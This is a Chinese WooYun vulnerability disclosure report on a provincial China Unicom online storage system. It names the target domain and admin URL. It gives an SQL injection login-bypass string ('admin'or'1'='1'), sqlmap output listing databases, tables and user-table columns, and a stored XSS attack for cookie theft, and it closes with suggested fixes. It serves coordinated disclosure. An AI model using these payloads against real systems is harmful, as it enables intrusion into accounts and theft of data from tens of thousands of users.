当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074594

漏洞标题:中国联通某省分公司网络保管系统存在SQL注射和XSS漏洞-全省现共有7万多用户使用

相关厂商:中国联通某省分公司

漏洞作者: cf_hb

提交时间:2014-09-02 10:41

修复时间:2014-10-17 10:42

公开时间:2014-10-17 10:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-02: 细节已通知厂商并且等待厂商处理中
2014-09-07: 厂商已经确认,细节仅向厂商公开
2014-09-17: 细节向核心白帽子及相关领域专家公开
2014-09-27: 细节向普通白帽子公开
2014-10-07: 细节向实习白帽子公开
2014-10-17: 细节向公众公开

简要描述:

现在北京时间3点35分,我从9点半开始测试到现在。找到了不少安全问题,争取一个小时写完好睡觉鸟!

详细说明:

身份:中国联合网络通信有限公司 吉林省分公司
域名:www.m10060.com
有图有真相:

index.PNG


按照等级排序先总结下发现的问题:
问题一:存在多处SQL注入漏洞,a'or'1'='1 万能密码登陆系统
问题二:短信珍藏模块存在一处存储型XSS漏洞,可以被利用盗取任意用户Cookie;
问题三:非授权访问目录和后台页面和源码泄露;
问题四:服务出错时,错误信息没有处理导致绝对路径暴露;
问题五:管理系统后台,没对用户信息模糊化,管理员可以直接查看任意用户帐号密码以及其他信息;
现在开始一个一个对这些问题进行描述和证明
问题一:
存在多处SQL注入漏洞,a'or'1'='1 万能密码登陆系统
万能密码登陆:admin'or'1'='1

sql.PNG


登陆URL:第一个URL测试万能密码桡过:
http://www.m10060.com/common/manager/
进入管理后台:

绕过.PNG


后台.PNG


72073个用户记录:

7万.PNG


看用户没有模糊化的信息:

inf.PNG


用户账号密码信息:

pas.PNG


登陆用户账号:

登陆用户保管箱.PNG


到此证明了用户信息没模糊化,后台登陆被绕过导致72073个用户账号被泄露,并使用用户账号登陆操作用户存放在网络保管箱的数据:
http://www.m10060.com/common/phone/login.jsp
第二个URL是客户端打开的,在电脑上直接访问会跳转到首页的!
我是这样绕过的:
先抓包看:

jump.PNG


whyYoujump.jpg


知道原因后用Brupsuite自动代理在响应流里替换处理掉那段js代码

no-jump.jpg


我很想知道这个是不是也没过滤呢?抓包用sqlmap测试于是:
数据库类型
DBMS: Microsoft SQL Server 2000
数据库
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] wo
[*] ymaildb
Database: wo
[4 tables]
+--------------------+
| dbo.UserOrder |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------+
数据库用户
database management system users [4]:
[*] BUILTIN\\Administrators
[*] sa
[*] wodb
[*] ymaildb
当前用户:
current user: 'ymaildb'
当前数据库:
current database: 'ymaildb'
当前数据库920多个表,列举了一部分表名:
"dbo.mz_msg"
"dbo.mz_dict"
"dbo.mz_content"
"dbo.mz_sendcycle"
"dbo.mz_friend"
"dbo.mz_item"
"dbo.mz_sendmsg"
"dbo.mz_msg_log"
"dbo.mz_sendlimit"
"dbo.mz_sendmsg_item"
"dbo.mz_sms_mo_log"
"dbo.mz_sms_mo_log_backup"
"dbo.mz_sms_mo"
"dbo.mz_seqinfo"
"dbo.mz_smsflow"
"dbo.mz_sendmsg_log"
"dbo.MZ_SMS_MT_LOG_BACKUP"
"dbo.mz_smsflow_conf"
"dbo.mz_smsflow_mt"
"dbo.mz_sms_mt"
"dbo.mz_sms_mt_log"
"dbo.mz_smsservice"
"dbo.mz_subitem_bak"
"dbo.mz_smsqcdz"
"dbo.mz_subuserreginfo"
"dbo.mz_td"
"dbo.mz_subuserreginfo_bak"
"dbo.mz_subitem"
"dbo.mz_unuserreginfo"
"dbo.mz_smsqcdz_new"
"dbo.mz_usersms"
"dbo.mz_temp"
"dbo.mz_useractinfo"
"dbo.mz_userreginfo"
"dbo.mz_workflow"
"dbo.mz_userstat"
"dbo.nmyj_not_billusers"
"dbo.temp_20130206_???????366?"
"dbo.temp_20130201_???????"
"dbo.temp_20130306_??G?"
"dbo.temp_20130319_????G???"
"dbo.temp_20130408_?????G???"
"dbo.temp_20130604_??????????(201209-201305)"
"dbo.temp_20130604_??????????(201209-201305)"
"dbo.temp_20130408_?????G???"
"dbo.temp_20130613_??????100?"
"dbo.temp_20130613_??????100?"
"dbo.temp_20130618_??6?????"
"dbo.temp_20130409_??G??????"
"dbo.temp_20130826_????6"
"dbo.temp_20130613_??5?????"
"dbo.temp_20130911_????"
"dbo.temp_20130911_????"
"dbo.temp_20130902_??8????????"
"dbo.temp_20131022_1133_ftp????"
"dbo.temp_20130922"
"dbo.temp_20131022_1133_??????"
"dbo.temp_20140604"
"dbo.temp_20131023_1125"
"dbo.temp_20131206_??"
"dbo.temp_20140328"
"dbo.temp_20140721_G"
"dbo.temp_lN_all"
"dbo.temp_20140721_0024"
"dbo.temp_6????????_20120710"
"dbo.temp_ln_as_20130922"
"dbo.temp_ln_20140326_g"
"dbo.temp_20140722_0415_201303"
"dbo.temp_20140722_0415G"
"dbo.temp_LN_PSTN_20120712"
"dbo.temp_ln201305???????"
"dbo.temp_ln_dl_20130922"
"dbo.temp_??_??_?????????"
"dbo.temp_????????_20110522"
"dbo.temp_??_??_??????"
"dbo.temp_??_????"
"dbo.temp_???????G?201206????"
"dbo.temp_????????201204"
"dbo.temp_????????201206?201204??"
"dbo.temp_??_??G??"
"dbo.trust_bath_interface"
"dbo.two"
"dbo.temp_????????201206"
"dbo.temp_??????267?_20110421"
"dbo.TY4YX_?????2?"
"dbo.user_lottery"
"dbo.userbaseinfo"
"dbo.undelive_20080630"
"dbo.undelive_20071227"
"dbo.usermailindex"
"dbo.TY2YX_??????"
"dbo.user_lot"
"dbo.usercalloutrecord"
"dbo.users"
"dbo.userreginfo"
"dbo.usermoney"
"dbo.undelive_20071202"
"dbo.users_20081220_bak"
"dbo.users_20080604"
"dbo.users_20081212"
"dbo.users_fee_success_200612"
"dbo.users_defined_message"
"dbo.users_fee_success"
"dbo.users_delmail_logs"
"dbo.users_fixed"
"dbo.users_action"
"dbo.users_itinerary_remind"
"dbo.users_bath_dredge_20080414"
"dbo.users_bak_20120329"
"dbo.users_initpwd_record"
"dbo.users_jl_cncself_20080710"
"dbo.users_jl_cncself"
"dbo.users_jl_taihua"
"dbo.users_ln_0427bill1"
"dbo.users_ln_0427new1users"
"dbo.users_ln_bath_11"
"dbo.users_ln_cncself"
"dbo.users_ln_cncself_024bill"
"dbo.users_ln_cncself_024bill2"
尝试读取某个表字段和数据,有点慢了就没等跑了
fetching columns for table 'users' in database 'ymaildb'
the SQL query used returns 42 entries
starting 10 threads
retrieved: "acct_id","decimal"
retrieved: "createdDate","varchar"
retrieved: "call_assistant","char"
retrieved: "addOldMail","int"
retrieved: "answer","varchar"
retrieved: "areacode","varchar"
retrieved: "curfaxn","int"
retrieved: "curmailn","int"
retrieved: "bath_dredge","char"
retrieved: "alias","varchar"
retrieved: "curmsgn","int"
retrieved: "curudisksize","int"
retrieved: "curSize","real"
retrieved: "forwardDestination","varchar"
retrieved: "domainName","varchar"
retrieved: "curvoicen","int"
retrieved: "grade","smallint"
retrieved: "mailDir","varchar"
retrieved: "itemCount","int"
retrieved: "logintimes","int"
retrieved: "lastLoginDate","varchar"
retrieved: "maxFaxTime","int"
retrieved: "popFirst","int"
retrieved: "ppwd","varchar"
retrieved: "reMailSign","varchar"
retrieved: "pwdAlgorithm","varchar"
retrieved: "pwdAlgorithm","varchar"
retrieved: "setDX","varchar"
retrieved: "pwdHash","varchar"
retrieved: "requestName","char"
retrieved: "state","smallint"
retrieved: "terminal_type","varchar"
retrieved: "type","char"
retrieved: "useAlias","smallint"
retrieved: "usedFaxTime","int"
retrieved: "user_type","varchar"
retrieved: "username","varchar"
retrieved: "useForwarding","smallint"
retrieved: "usercode","varchar"
retrieved: "userid","int"
retrieved: "whether_billing","int"
retrieved: "question","varchar"
fetching entries for table 'users' in database 'ymaildb'
fetching number of distinct values for column 'ppwd'
fetching number of distinct values for column 'type'
fetching number of distinct values for column 'alias'
fetching number of distinct values for column 'grade'
fetching number of distinct values for column 'setDX'
fetching number of distinct values for column 'state'
fetching number of distinct values for column 'answer'
fetching number of distinct values for column 'userid'
using column 'userid' as a pivot for retrieving row data
到此SQL注入漏洞已经证明了!
问题二:
短信珍藏模块存在一处存储型XSS漏洞,可以被利用盗取任意用户Cookie;
这个是在翻找目录文件下无意中测试出的

info.jpg


前面是这样的:

越权.PNG


因为添加那个标签里有长度限制,编辑后抓包修改:

edite_XSS.PNG


然后添加成功:

越权添加.PNG


然后开短信珍藏模块:

xss-短信.jpg


一打开这个模块就弹出来了!!!!!
到此存储性XSS证明完毕!!
问题三:
非授权访问目录和后台页面和源码泄露;
直接上图:

1.PNG


2.PNG


4.PNG


source.PNG


问题四
服务出错时,错误信息没有处理导致绝对路径暴露;

3.PNG


手机客户端的截图:

QQ图片20140901032808.jpg


大概就说这么多了!!现在是北京时间4点37分!好困。。。

漏洞证明:

请看上面

修复方案:

1. 对用户提交的参数严格进行输入输出过滤
2. 修改服务器配置,不允许非授权用户访问后台页面和目录。
3. 出错时别直接显示在浏览器上
4. 建议管理后台对用户信息模糊化处理,至少密码不能是明文放出来呀!

版权声明:转载请注明来源 cf_hb@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-07 09:22

厂商回复:

最新状态:

暂无


漏洞评价:

评论